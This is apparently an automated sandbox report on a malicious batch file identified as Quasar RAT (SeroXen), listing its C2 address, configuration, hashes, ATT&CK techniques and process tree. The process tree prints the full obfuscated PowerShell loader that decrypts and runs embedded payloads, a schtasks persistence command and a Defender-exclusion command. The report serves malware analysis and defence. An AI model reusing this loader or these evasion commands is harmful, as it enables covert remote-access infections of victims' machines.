Overview

overview

10

Static

static

1

rename me.bat

windows10-1703-x64

10

rename me.bat

windows10-2004-x64

10

rename me.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    154s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-04-2024 16:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    rename me.bat

  • Size

    328KB

  • MD5

    aeb5d5210a55384c6019bc889ab2712a

  • SHA1

    524094d4dc90b48c110e24b26aa6cebbf15937cf

  • SHA256

    3f077245d055648ee67c8597d813805f43a1a750abf17b6597ec49e6e61bba1e

  • SHA512

    2e71352ad66c150a217784f0eeec50d001eef3fa60be33dd98bec3503dc0356b8e6b6df4042e1bddfb4933b25ba5c9a4202450eb6604ae00bb48a1495f54910f

  • SSDEEP

    6144:v49D8DR1G9Pj1pP+irNTVDxmev+lcvhEvLpPxJMRLRsvjoOo50AqPJNIA3OiL5O9:v49DuPGtjP+irnDIev+lcv2pxLjoOoOq

Score
10/10
quasarseroxenspywaretrojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

C2

147.185.221.19:33587

Mutex

$Sxr-2rfrZTKITtK0P0zGYG

Attributes
  • encryption_key

    Yr0YpBPNd3kXsl43jZMx

  • install_name

    $sxr-sdinwn.exe

  • log_directory

    $sxr

  • reconnect_delay

    3000

  • startup_key

    $sxr-metsha

  • subdirectory

    sxr

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rename me.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3112
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c9cTBUxEQ3bkhNltovJO4VlBnFPtuZDAn3tKbTZM170='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q2umC619B9pCpnnAKCTQLg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FSGQo=New-Object System.IO.MemoryStream(,$param_var); $zrACb=New-Object System.IO.MemoryStream; $JlDkU=New-Object System.IO.Compression.GZipStream($FSGQo, [IO.Compression.CompressionMode]::Decompress); $JlDkU.CopyTo($zrACb); $JlDkU.Dispose(); $FSGQo.Dispose(); $zrACb.Dispose(); $zrACb.ToArray();}function execute_function($param_var,$param2_var){ $abVXg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NJXTr=$abVXg.EntryPoint; $NJXTr.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rename me.bat';$EvryY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rename me.bat').Split([Environment]::NewLine);foreach ($rkrqt in $EvryY) { if ($rkrqt.StartsWith(':: ')) { $xqxsV=$rkrqt.Substring(3); break; }}$payloads_var=[string[]]$xqxsV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Drops file in Drivers directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2568
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:412
      • C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe
        "C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1680
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath (Get-Item -LiteralPath $env:SystemRoot).Root"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2588
      • C:\Windows\SysWOW64\ipconfig.exe
        "C:\Windows\System32\ipconfig.exe" /flushdns
        3⤵
        • Gathers network information
        PID:2748
  • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
    "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:4316

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1
T1053

Command and Scripting Interpreter

1
T1059

Persistence

Scheduled Task/Job

1
T1053

Privilege Escalation

Scheduled Task/Job

1
T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    1e397c872217eab72d5de566c46069fe

    SHA1

    911b988398b3d9f6f38c861eaf6294439d011fb6

    SHA256

    d7a6bfbbe97bc9bb7f60ab6e8c5d4673d788a8bed736c31541086012051b51ef

    SHA512

    12182c805971f7b134b10e66132b9bf8f9caffb1413b8f7f122c21c62ab4b949d4566f9c5e76128e433f87426078e0983f5955a18ba773b0208aaf99cfd86ea2

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize

    60KB

    MD5

    0a9da256ffcfe42119c7a351e5eaaa9c

    SHA1

    c992b8e18cfc24faee739511beb5094189806177

    SHA256

    f4750e5af8c84626318382887c9c17e6555eff006af7d7e88cadd562ab2ee8ed

    SHA512

    451f4d470fe938a7c71d340f0711a9d1cb98f542138bd95584244471fa5f31beba8274699be1e497742ce91182dc9e308ca2d9ce3d004174a8228cca4c118672

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    039e38a1e0880cc4c7c1ff3f00c9d2fc

    SHA1

    231a9545b73adddfaed965e4a7dea9d714fffde0

    SHA256

    560c9f9192cf2630a501472bd73285c84ba2f84adb109ff327fc9689aef994f0

    SHA512

    e70b7af5768f200dab07a2816c545f8594df0da13e0df2a047119e3017b17474ecbc457792380b45687f58e7bc25dcaf9526254cd4498ef59254510875281cc1

    Download Submit
  • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
    Filesize

    10KB

    MD5

    488fb293f54c7986cc01d8b5b2ee4f45

    SHA1

    ae138e6b1ea4d58619e0193ec47b0928a6506914

    SHA256

    b93b943f969d4c2eb49633db24200e2198847b03fa93f47da15f3758401b760f

    SHA512

    8a56ae10eadf7e2d06cfa7c6d33e160e9969cf94d6306d21f5772a4ace77d886bcbaa1788200545b40deb86912400bf3aad3228f4a9ba049871095d377761158

    Download Submit
  • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
    Filesize

    10KB

    MD5

    fade983aa9160f2b7e40456fdec2bcdc

    SHA1

    8365fa43bd0ea027666c0f5b3f5dda26b4414a67

    SHA256

    7439902fb2297ef5b339676d5941efa5884815150c88fd17ebd64c54e4049591

    SHA512

    01edc7b5fb328c847ca1a2f24f451a4d87432f48803b02d3d6b395d2073f2bf1f9abd20444a90b467f72b1d0737040a4f94f894ac5c1cc56dd2226bc5e08d966

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ovip50jl.kyy.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit
  • C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe
    Filesize

    411KB

    MD5

    bc4535f575200446e698610c00e1483d

    SHA1

    78d990d776f078517696a2415375ac9ebdf5d49a

    SHA256

    88e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122

    SHA512

    a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717

    Download Submit
  • memory/1680-71-0x0000000006EB0000-0x0000000006EF6000-memory.dmp
    Filesize

    280KB

    Download
  • memory/2568-17-0x0000000006840000-0x000000000688C000-memory.dmp
    Filesize

    304KB

    Download
  • memory/2568-4-0x0000000005A70000-0x0000000005A92000-memory.dmp
    Filesize

    136KB

    Download
  • memory/2568-0-0x0000000074A60000-0x0000000075211000-memory.dmp
    Filesize

    7.7MB

    Download
  • memory/2568-18-0x0000000008050000-0x00000000086CA000-memory.dmp
    Filesize

    6.5MB

    Download
  • memory/2568-19-0x0000000006DE0000-0x0000000006DFA000-memory.dmp
    Filesize

    104KB

    Download
  • memory/2568-20-0x00000000079D0000-0x00000000079D8000-memory.dmp
    Filesize

    32KB

    Download
  • memory/2568-21-0x0000000007A20000-0x0000000007A60000-memory.dmp
    Filesize

    256KB

    Download
  • memory/2568-22-0x0000000007C20000-0x0000000007C8E000-memory.dmp
    Filesize

    440KB

    Download
  • memory/2568-23-0x0000000008C80000-0x0000000009226000-memory.dmp
    Filesize

    5.6MB

    Download
  • memory/2568-24-0x0000000007DA0000-0x0000000007E32000-memory.dmp
    Filesize

    584KB

    Download
  • memory/2568-25-0x0000000005790000-0x00000000057A2000-memory.dmp
    Filesize

    72KB

    Download
  • memory/2568-26-0x0000000074A60000-0x0000000075211000-memory.dmp
    Filesize

    7.7MB

    Download
  • memory/2568-15-0x00000000062F0000-0x0000000006647000-memory.dmp
    Filesize

    3.3MB

    Download
  • memory/2568-6-0x00000000061C0000-0x0000000006226000-memory.dmp
    Filesize

    408KB

    Download
  • memory/2568-46-0x0000000003460000-0x0000000003470000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2568-47-0x0000000003460000-0x0000000003470000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2568-5-0x0000000005B10000-0x0000000005B76000-memory.dmp
    Filesize

    408KB

    Download
  • memory/2568-16-0x0000000006800000-0x000000000681E000-memory.dmp
    Filesize

    120KB

    Download
  • memory/2568-1-0x0000000003460000-0x0000000003470000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2568-3-0x0000000005B90000-0x00000000061BA000-memory.dmp
    Filesize

    6.2MB

    Download
  • memory/2568-2-0x0000000003470000-0x00000000034A6000-memory.dmp
    Filesize

    216KB

    Download
  • memory/2568-87-0x0000000074A60000-0x0000000075211000-memory.dmp
    Filesize

    7.7MB

    Download
  • memory/2588-83-0x0000000006FF0000-0x000000000700E000-memory.dmp
    Filesize

    120KB

    Download
  • memory/2588-84-0x0000000007020000-0x00000000070C4000-memory.dmp
    Filesize

    656KB

    Download
  • memory/2588-73-0x0000000006FB0000-0x0000000006FE4000-memory.dmp
    Filesize

    208KB

    Download
  • memory/2588-74-0x0000000070C50000-0x0000000070C9C000-memory.dmp
    Filesize

    304KB

    Download
  • memory/2588-88-0x0000000007220000-0x000000000722A000-memory.dmp
    Filesize

    40KB

    Download
  • memory/2588-89-0x0000000007380000-0x0000000007391000-memory.dmp
    Filesize

    68KB

    Download
  • memory/2588-90-0x00000000073C0000-0x00000000073CE000-memory.dmp
    Filesize

    56KB

    Download
  • memory/2588-91-0x00000000073D0000-0x00000000073E5000-memory.dmp
    Filesize

    84KB

    Download
  • memory/2588-92-0x00000000079E0000-0x00000000079FA000-memory.dmp
    Filesize

    104KB

    Download
  • memory/2588-93-0x0000000007410000-0x0000000007418000-memory.dmp
    Filesize

    32KB

    Download
  • memory/2588-72-0x00000000061D0000-0x00000000061F2000-memory.dmp
    Filesize

    136KB

    Download
  • memory/2588-70-0x0000000006DE0000-0x0000000006E76000-memory.dmp
    Filesize

    600KB

    Download